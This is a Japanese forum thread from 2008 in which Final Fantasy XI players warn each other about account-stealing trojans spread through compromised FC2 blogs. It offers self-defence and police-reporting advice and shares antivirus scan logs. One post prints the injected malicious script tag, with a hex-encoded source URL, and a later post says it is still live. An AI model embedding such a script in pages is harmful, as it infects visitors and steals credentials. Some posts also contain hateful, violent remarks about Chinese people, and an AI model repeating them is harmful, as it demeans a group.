●● RMT業者の垢ハックが多発している件14 ●●
1 :
既にその名前は使われています :
2008/03/24(月) 02:50:21.34 ID:7DTVIQ6X
2 :
既にその名前は使われています :2008/03/24(月) 02:50:50.08 ID:7DTVIQ6X
■アカウントハックとは 主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる 罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。 ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。 奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。 ※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為 ※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。 ※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります
3 :
既にその名前は使われています :2008/03/24(月) 02:51:08.68 ID:7DTVIQ6X
■予防と自衛が各プレイヤーに求められています。 被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。 【公式より抜粋】 ▼内容が不明なサイトにアクセスしない ※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。 絶対にリンクを押す前にアドレスを見る事 ▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない ▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ ※詳しくはマイクロソフト社の公式サイトを参照のこと。 ▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する ▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない ▼ウイルス駆除ソフトを常に最新のバージョンで使用する
4 :
既にその名前は使われています :2008/03/24(月) 02:51:55.37 ID:7DTVIQ6X
■具体的な自衛策 1:ウイルススキャンソフトを導入する。 ・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。 ・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。 2:WindowsUpdateでWindowsを最新の状態にする Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを 後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。 一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。 3:ファイアウォールを有効にする ・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う ・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する (2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの スレッドがあります。「ファイアウォール」などの単語で検索してください)
5 :
既にその名前は使われています :2008/03/24(月) 02:52:01.80 ID:EkJgurYg
業者あげ
6 :
既にその名前は使われています :2008/03/24(月) 02:52:10.54 ID:7DTVIQ6X
■具体的な自衛策その2
4:IPフィルタを導入する
PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます
★PeerGuardian2の導入・設定方法はここから
リネージュ資料室
ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
セキュリティー対策→IPフィルタ で確認してください。
5:IE以外のウェブブラウザを使用する
Firefox、Opera、など。
ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
ブラウザ自体のアップデートも行う必要があります。
6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
ttp://www.aguse.jp/ URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。
7 :
既にその名前は使われています :2008/03/24(月) 02:52:30.81 ID:7DTVIQ6X
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず
>>1 にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。
現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。
不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。
この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。
8 :
既にその名前は使われています :2008/03/24(月) 02:52:49.34 ID:7DTVIQ6X
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm 2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
(この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
9 :
既にその名前は使われています :2008/03/24(月) 02:53:03.17 ID:7DTVIQ6X
■警察へ行く際に持っていく・用意しておくもの 過去スレで実際に警察へ行った被害者のレスから抜粋 もっていったもの † o スクエニの会社情報 HPのプリントアウトしたもの o プレイオンラインサポセンの電話番号 o 印鑑、身分証明 受け答えしてくれたサポセンの人の名前も伝えるといいかも ↑ 警察で聞かれたもの † o プレイオンラインのIDとパスワード o キャラ名 o 犯行時間帯 o 被害内容(なくなったゲーム内通貨・アイテム) o プロバイダ
10 :
既にその名前は使われています :2008/03/24(月) 02:53:56.36 ID:7DTVIQ6X
■このスレの目的 1:予防・自衛の徹底の周知 2:被害報告の収集 3:罠サイトURIの収集 4:被害者が現れた場合に対処をアドバイスする ★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください ☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は 無視せずに対応してください。
11 :
既にその名前は使われています :2008/03/24(月) 02:54:22.50 ID:7DTVIQ6X
■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html [Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。
Name=名前(必須) Email Address=メール(必須) Real name=本名(任意) Server name=サーバー(必須)
Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です
[Preview Your Signature]=貴方の署名を確認します
View Signatures Without Signing=署名をしないで他の署名を見ます
>>1 乙
ウエブマニー組で今現在パス抜き被害あってないから安心したってやってたら、課金後
に被害食らうかもしれんね。
13 :
既にその名前は使われています :2008/03/24(月) 03:05:44.32 ID:EkJgurYg
紙媒体しか安心して見れないこんなFFじゃ
14 :
既にその名前は使われています :2008/03/24(月) 03:16:22.91 ID:mYAh1jWO
RMTする人達が減ったのかな?o(`ω´*)o
15 :
既にその名前は使われています :2008/03/24(月) 03:19:43.83 ID:euFX6pRg
中国はマジで腐った国だな。
16 :
既にその名前は使われています :2008/03/24(月) 03:21:27.29 ID:BS8RD3fS
いちょつ
17 :
既にその名前は使われています :2008/03/24(月) 03:22:44.14 ID:BS8RD3fS
18 :
既にその名前は使われています :2008/03/24(月) 03:24:47.93 ID:IxSaroBR
カスペのオンラインスキャンが動くブラウザを使わないほうがいいぞ あれが動かないブラウザのほうがセキュリティ的には信用できる オペラなんて罠ページ踏んでも(だいたい)平気だぜ・・・普通のページも見れないことあるが・・・
>>15 自分が痛くなければ何やっても愛国無罪な国だからな
20 :
既にその名前は使われています :2008/03/24(月) 03:43:51.91 ID:l9SAEJ0+
21 :
既にその名前は使われています :2008/03/24(月) 03:50:16.95 ID:Df86aKNo
ヴァナモンブログちょっとひどくね? 改ざんされたことを責めるつもりは毛頭ないが、そのことに触れずにしれっと直して あたかもなにもありませんでした、みたいなのはチキンすぎる。 自分のブログに訪れてくれた読者に対して申し訳ないとか思わないのかね? こういうのを認めると今後そういうやつが増えて被害拡大するとおもうんだ。
ネットは自己責任。 叩き所が間違ってる。
まぁ注意喚起位すればいいとは思うけど、fc2のせいであってヴァナモンのせいじゃないしな。 どちらかといえばfc2がページの上に告知するとか 問題を抜本的に解決できるような方法を提示しないこと、またそれを実行しないことが問題。
前スレ57, 63(
http://live27.2ch.net/test/read.cgi/ogame/1205225002/57,63 )の
xia.exeを実行してカスペルスキー試用版でのスキャン終了
(1/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\05S94ZKH\1ro[1].exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8DUF8TQ3\laoie[1].exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8X2ZG5A3\geizi[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\CNA1O3S3\3ff11[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\S1ANG1QF\2t1[1].exe
検知: トロイの木馬 Trojan-Downloader.Win32.Delf.dsz
→ファイル: C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\Help\3EC849F38E63.dll
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
→ファイル: C:\WINDOWS\Help\3EC849F38E63.exe
25 :
既にその名前は使われています :2008/03/24(月) 04:00:24.85 ID:8jcNID1A
(2/2) 検知: トロイの木馬 Trojan.Win32.Inject.agc →ファイル: C:\WINDOWS\system32\1.exe 検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb →ファイル: C:\WINDOWS\system32\2.exe 検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa →ファイル: C:\WINDOWS\system32\3.exe 検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd →ファイル: C:\WINDOWS\system32\4.exe//FSG 検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx →ファイル: C:\WINDOWS\system32\5.exe 検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.pnr →ファイル: C:\WINDOWS\system32\krnp32drv.dll 検知: アドウェア not-a-virus:AdWare.Win32.BHO.aj →ファイル: c:\windows\system32\xunleibho_001.dll こんな感じ
26 :
既にその名前は使われています :2008/03/24(月) 04:03:02.46 ID:Q/ktx4QO
>>21 ヴァナモンブログ主を責めるのはちょっとひどくね?
改ざんされたテンプレートをそのまま放置しているfc2を責めることをせずに、
個人を叩いてひゃっほい、みたいなのはチキンすぎる。
運営しているサイトに訪れてくれた読者に対してfc2は申し訳ないとか思わないのかね?
こういうのを認めると今後こういう運営をするやつ増えて被害拡大するとおもうんだ。
であろう?
27 :
前スレ969 :2008/03/24(月) 04:06:50.23 ID:Vn0/fEwr
カスペルのスキャンが1時間早く終わったーヽ(´ー`)ノ 結果はバスターさんの前に使ってたノートン先生の置き土産が、マルウェアに勘違いされたくらいですた。 以前から使っていたPG2とFirefox&IFRAMEの禁止、今回のカスペルくらいが 自分みたいな素人ができる自衛手段ですかのう。 あ、今使ってるHUBの機械が8年前から使ってるcoregaっていうメーカーのなんだけど、これってマズイ?(´・ω・`)
28 :
既にその名前は使われています :2008/03/24(月) 04:13:56.30 ID:Df86aKNo
もちろんまずはfc2が何か言うべきとは思うけどさ。 今後まだまだ改ざんブログが増えるであろうことを考慮すると その事実を個人レベルで隠蔽するような行為はどうかと思ったんだ。 このスレ的にはブログで事実報告の必要は無いって意見が多いってことか、了解。
29 :
既にその名前は使われています :2008/03/24(月) 04:16:01.17 ID:Q/ktx4QO
Trojan.Win32.Inject.agc まず、こいつがきっかけで次のダウンローダを起動する。 Trojan-Downloader.Win32.Delf.dsz 次の4種のワームをダウンロードし、常駐させる。 Trojan-PSW.Win32.OnLineGames.sfa Trojan-PSW.Win32.OnLineGames.lbb Trojan-PSW.Win32.OnLineGames.sfa Trojan-PSW.Win32.OnLineGames.pnr 各MMOに対応したID/pw保存ファイルサーチャ Backdoor.Win32.Hupigon.dsx 上記4種のワームが検出したID/pw保存ファイルを どこぞに送信するためのポートを開けるとともに 遠隔操作用のポート開けて常駐して待機する。 そして、見事にBOT-NET入りを果たすと。
30 :
既にその名前は使われています :2008/03/24(月) 04:26:34.88 ID:B+yN8em4
いつも見てるFF系ブログの大半がFC2だったわ・・・・ カスペでスキャンしてなんともなかったから良かったが、怖くて暫くはブログ見れないな。
31 :
既にその名前は使われています :2008/03/24(月) 04:26:41.08 ID:Q/ktx4QO
>>28 いいか?
改ざんしたのはブログ主ではなく、悪意のテンプレートにしたやつがいて
悪意のあるテンプレートを供給していた運営者がいるんだよ。
つまり、
改ざんしたテンプレートを運営者に出したやつが主犯
そのテンプレートをまともにチェックせずに公開したやつが共犯
なのさ。
本当に叩く先がどこか分かるよな?
確かに注意勧告をブログ主もするとベターだろうが、
ブログ主もクラックされた被害者な訳だ。
手動でパス打つほうが危ないなんてことは・・・ないよね?
33 :
既にその名前は使われています :2008/03/24(月) 04:31:35.92 ID:Q/ktx4QO
>>30 BLOGを読むときの手として、直接行くのではなく、RSSリーダで読むのもあり。
なぜかというと、直接行くと、テンプレートを含む全体を読み込むが
RSSリーダならば、本文しか普通は読み込まない「はず」
34 :
既にその名前は使われています :2008/03/24(月) 04:32:51.75 ID:juaPfmeM
でもさ、ヴァナモンblogで感染して それを知らずに感染したまま今もヴァナモンblogを見ている人もいると思うんだよね。 叩く矛先の優先順位の問題ではないと思うんだ。
35 :
既にその名前は使われています :2008/03/24(月) 04:34:12.73 ID:Q/ktx4QO
>>32 >>29 のTrojan-PSW.Win32.OnLineGamesの4つが
キーロガーに変わったらどうなるだろうね?
どっちが安全なんてないね。
つか、キーロガーの方が広範囲に情報取れるな。
36 :
既にその名前は使われています :2008/03/24(月) 04:35:57.93 ID:Df86aKNo
>>31 わかった、っつってるのに粘着なヤツだなw
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
今のところこれに関しては事実関係が確定してないと思ってたんだが確定したのか?
そこまで粘着するなら本人に言えとしか、是非をうんぬんするスレじゃないよ。
38 :
既にその名前は使われています :2008/03/24(月) 04:37:03.15 ID:/fj6dMAF
ちょっと聞きたいんですけど ヴァナモンblogではなく ヴァナモンでのモンスター検索の方は大丈夫なんでしょうか? 個人的にblogは見ずに検索だけをメインにしてたので・・・
個人にそういう役目を担わせる義務はないだろうから 人目につくネ実で、スレ保持/情報共有、注意呼びかけるなど。 有志アカハク専用サイトあんだし。
>>21 テンプレ改竄問題は知ってたけど、
ウチがテンプレ改竄されたの今知って飛んで来たところなんだが
毎日毎日業者のコメントがウザかったので丁度数日前に
http://をNGワードにしたんだよな その報復なんだろうか
でテンプレチェックしてるんだけど、どう直せばいいのか教えて欲しいんだが
テンプレには%77とか入ってないぞ?
41 :
既にその名前は使われています :2008/03/24(月) 04:38:13.47 ID:8jcNID1A
ノートンが検出できない4種類のファイルを検体としてシマンテックに送付した
>>27 8年前程度なら、すでにバカHUB入手しづらくなってたと思うから、
スイッチングHUBじゃね?
43 :
既にその名前は使われています :2008/03/24(月) 04:39:47.13 ID:Xxx+f+/4
粘着っつうか、過剰擁護に反論してるだけだろ
44 :
既にその名前は使われています :2008/03/24(月) 04:40:06.77 ID:Q/ktx4QO
>>34 fc2がテンプレートの配布と利用を止めたらどうなるかね?
読めないのを不思議に思って、読者は何かするんじゃないか?
まぁ、何もしない読者だから感染するんだけどさ。
「ブログ主が注意勧告するのはベターだ」が、
自責としてメインで動くべきは運営側であろう?
45 :
既にその名前は使われています :2008/03/24(月) 04:43:33.34 ID:8jcNID1A
>>40 ヴァナモンの人こんばんは
私が夕方に見たときにはすでに無くなってたのでなんとも
46 :
既にその名前は使われています :2008/03/24(月) 04:43:37.03 ID:Df86aKNo
>>40 本人キター、って・・・あれ?直してないの?
ソースチェッカーで改ざんされてたのをオレは確認してて、
ソースが消えたのも確認したんだが・・・・なんで消えたんだろう?
というかもう直ってるの?
>>21 でしれっと直してって書いてあるんだけど
俺は何も弄ってないんだけどな
3週間くらい前だったかな?ブログにFC2のブログがハックされて〜
ヴァナモンさんも注意してくださいってブログにコメントくれた人が居たんだよね
でその時もチェックしたけどそれっぽいのは無かったし
48 :
既にその名前は使われています :2008/03/24(月) 04:44:15.26 ID:juaPfmeM
>>44 だからその「サイトで勧告するのがベターだよね」という話でしょ。
FC2よりもまずヴァナモンを叩くという話ではないはずなのに
なぜかそういう方向へ持っていって擁護されるんだよね。
とりあえず前スレを確認してきます
しれっと直してやのその事実を個人レベルで隠蔽するような行為やの書いてる 奴は叩きと認識されるでそ。 FF取り上げる全てのサイトやネ実でななしやロカルーででかでかと注意喚起すべき だろうけどね。
51 :
既にその名前は使われています :2008/03/24(月) 04:49:45.63 ID:rpE40Jdl
iframeもなかったのかな。勝手に消えたって、業者が埋め込んでまた消すってあるのかな???
ここまで、話題になったんだから、国レベルで、どうにかしてほしいもんだ
中国人は最近ではチベットの件とかいろいろ物議醸し出してるからなぁ それでなくても「中国、韓国お断り」は俺の知ってる世界では常識だし 国レベルで中国に核を落としてくれたらいいのにね
>悪意のあるテンプレートを供給していた >改ざんしたテンプレートを運営者に出したやつ ここは私も気になる所です ブログのテンプレはDL以降、ブロガー個人での管理になるから 有名ブログのテンプレ改竄はブログ管理のID・passの漏洩によって 発生する場合が大半だと思っていたけど実際はどうなんでしょうか? 悪意のあるテンプレートが公開されているケースもないとは言えませんが
55 :
既にその名前は使われています :2008/03/24(月) 04:54:41.34 ID:dI49kwAF
>>46 仕込まれてたのはscript?
iframeなら広告が原因だろうか。
56 :
既にその名前は使われています :2008/03/24(月) 04:55:15.07 ID:Q/ktx4QO
中国自体が核保有国だから、なんかしでかしてくれるのを期待したいw
57 :
既にその名前は使われています :2008/03/24(月) 04:56:23.92 ID:A+UNPr50
>>47 エントリーのブロックが終わって
<<--!コメント-->>の直下に
<script language="javascript"
src="hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
こんなんがあった
本来はhttpだったが誤アクセス防止にxxにしといた。
本人が直したんじゃないってことはグーグルに気づかれたために業者が直したかのかな
ヴァナモンをグーグルで検索すると危険サイトに指定されている。
58 :
前スレ969 :2008/03/24(月) 04:57:03.38 ID:Vn0/fEwr
>>42 おお、ありがとう。
家族がネットでの自己防衛に無頓着&家族にすらPC触らせたがらないんで心配だったんよ(´・ω・`)
大丈夫そうなんで、当分の間HUBはいまの機械使っておくよ。
さすがにやばいんで寝る。
夜までこのスレが生き残っていることを祈りつつあげ!
59 :
既にその名前は使われています :2008/03/24(月) 04:58:18.68 ID:A+UNPr50
>>55 広告が原因って意味不明なんだが
ちなみに黒魔の軌跡のところは最初iframeだったのがいつのまにかscriptにかわってた
業者が何度も改竄してるとみるべきじゃねーか?
3/19の夜に
http://をNGワードにしたんだよな それからパッタリ業者のコメント無くなってたんだが
それの報復ぽよなぁ。
となると3/19以降に仕掛けられた可能性が高いと思う。
つーか他のFC2のサイトと違うテンプレ使ってるし
防ごうとして防げるのこれ?
62 :
既にその名前は使われています :2008/03/24(月) 05:04:26.58 ID:A+UNPr50
>>60 テンプレ何つかってるとかそういう問題じゃない
あとNGとか関係ねーとおもうよ
割とアクセス多いところを狙ってるみたいだし
最初は検索トップにでるサイトだけだったが
今はなりふり構わず無差別になりつつある
63 :
既にその名前は使われています :2008/03/24(月) 05:05:16.22 ID:mrzccnLo
>>32 ID Managerとかは使えないの?キーロガーには引っかからない&クリップボード経由でもなくなる。
PCじゃFFしないから知らないけどw
64 :
既にその名前は使われています :2008/03/24(月) 05:05:57.77 ID:rpE40Jdl
報復ってより、今はどこもコメント承認制だったりで てっとり早く感染させられる改竄の方主流にしだしたとかかもですね
65 :
既にその名前は使われています :2008/03/24(月) 05:06:05.62 ID:Q/ktx4QO
>>57 それ、まだ生きてるな。
ActiveX起動して、www■fccja■com/d2.aspに飛ばしとる。
で、%うんたらってとこからすると、UTFじゃない?
66 :
既にその名前は使われています :2008/03/24(月) 05:06:33.24 ID:Df86aKNo
>>60 自分で直したんじゃないのなら業者が再利用するために消したって可能性あるね。
まずはfc2のパスワード変えてみたらどうだろう?
67 :
既にその名前は使われています :2008/03/24(月) 05:09:43.58 ID:Q/ktx4QO
>>61 うひ、誰ぞサイトアドバイザに報告したのがいるんだわw
えーとそれで、ウチ見て感染した場合はカスペルキーとかいうのでチェックがいいのかな?
普通のウイルススキャンじゃ引っかからない?
googleのキャッシュはブログが有害指定されてるから無いっぽいので
いつのキャッシュから判断してるのか分からないけど
土曜の深夜に誰か気づいたってことは、仕込まれたのやっぱ先週中頃以降じゃないのかなぁ
ヴァナモンで検索して
>>61 になったら誰かすぐ気づくだろうし
69 :
既にその名前は使われています :2008/03/24(月) 05:21:04.67 ID:Q/ktx4QO
70 :
既にその名前は使われています :2008/03/24(月) 05:24:10.66 ID:Q/ktx4QO
71 :
既にその名前は使われています :2008/03/24(月) 05:25:08.58 ID:zadZE9R9
管理できないなら削除しろ 大きな被害でてるぞ
ほんとに業者やりたい放題だな FC2運営内部にRMT関係者か金を貰って工作している奴がいるとしか思えん 対策出来ない以上はblogを見ないという選択肢しか無いじゃん
今の所ブログのみで、 HPコンテンツ等のメインサーチの方は 改ざんなさそうだね。
74 :
既にその名前は使われています :2008/03/24(月) 05:30:14.79 ID:nn2RN4KX
75 :
既にその名前は使われています :2008/03/24(月) 05:31:10.21 ID:dI49kwAF
落ち着くまで、パスワードかけて非公開にしとくとか。 パス認証画面が安全かどうかは分からんのだが。
76 :
既にその名前は使われています :2008/03/24(月) 05:43:24.08 ID:f8U+hHlG
>>68 いまいち原因把握出来て無さそうだし、一時的にでもブログ停止した方がよくないか?
今まで随分お世話になって偉そうな事を言うのもあれだが、いつまたやられるかわからんぞ
77 :
既にその名前は使われています :2008/03/24(月) 05:51:44.38 ID:sV5MTkg6
ヴァナモンブログが利用していたテンプレートに最近何か仕込まれて、今日までにかなり感染した。 現在では、そのテンプレートは何も仕込まれてないものに修正されている。 こういうことか? テンプレの提供元であるfc2に問題があると?
78 :
既にその名前は使われています :2008/03/24(月) 06:01:37.22 ID:9jGDstCn
"%77%77%77%2E%〜" ってのは普通の人間はぱっと見が書かれてるか判らん罠。
URLを16進コードで書いたもので"www.〜"ってコトなんだけど
ブラウザが自動変換してたら%77で検索しても意味無いかも。
>>57 に書かれてる謎の文字列を変換するとhellh■netへのurlになる。
79 :
既にその名前は使われています :2008/03/24(月) 06:31:03.34 ID:8CSFG+dl
こんな時間に新スレ移行したのか、いちおつ。 もしかしたらまとめの人がログ取り切れてないかもしれないから、 誰か一応前スレのログを保存しといてくれ。俺は携帯なんでできないんだ
80 :
既にその名前は使われています :2008/03/24(月) 06:41:19.69 ID:QCo+vR7/
FC2から公開されている段階のテンプレには(おそらく)問題なく、 テンプレをDLした後に、ブログの管理画面で利用者(ブロガー)個人がテンプレの ソースを改変することが出来るから、そこで改竄されたんだと思っています。 FC2ブログの管理画面に行く際に必要なIDとpassの内 IDはそのブログURLの一部に使われているから一目瞭然で、passだけ判明してしまえば ブログ管理画面にいけてしまうんですよね passだけなら総当りで試行すれば簡単に一致してしまいそうな気が… 私もFC2でブログを書いているんですが、これを気に閉鎖しようと思っています
81 :
既にその名前は使われています :2008/03/24(月) 06:57:03.29 ID:hdKDzAOI
試しにカスペルスキーのオンラインスキャンしたら こんな物が引っかかったのだけれど… ググってもよくわからん not-a-virus:PSWTool.Win32.Messen.n これってやられちゃってる?(ノω`)
82 :
既にその名前は使われています :2008/03/24(月) 07:01:42.72 ID:JYmJyemP
カスペ関連で一気にFF潰せそうな勢いだなの
83 :
既にその名前は使われています :2008/03/24(月) 07:04:39.69 ID:n0XTFGnb
中国人を 一日3人まで殺しても 罪にはなりません^^
84 :
既にその名前は使われています :2008/03/24(月) 07:18:44.68 ID:A+UNPr50
>>80 IDつかわれてねーよ
お前がぬるいだけじゃねーの
85 :
既にその名前は使われています :2008/03/24(月) 07:22:21.89 ID:rCHR+RwE
おはようございます。起きたら終わってました。 報告です。 ターゲットの選択: マイ コンピュータ ソース: A:\; C:\; D:\; E:\; F:\; G:\; E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\H8OJH9OT\t1[1].exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\SBT7I6Z1\ff11[1].exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ E:\Program Files\Common Files\Microsoft Shared\MSInfo\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067565.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067628.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067790.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067872.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068007.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068071.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068284.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068370.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
86 :
既にその名前は使われています :2008/03/24(月) 07:23:29.42 ID:rCHR+RwE
続きです E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP585\A0068454.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069244.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069282.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069295.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069311.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069323.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069332.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069333.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069345.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069346.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
87 :
既にその名前は使われています :2008/03/24(月) 07:25:18.69 ID:rCHR+RwE
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr スキップ
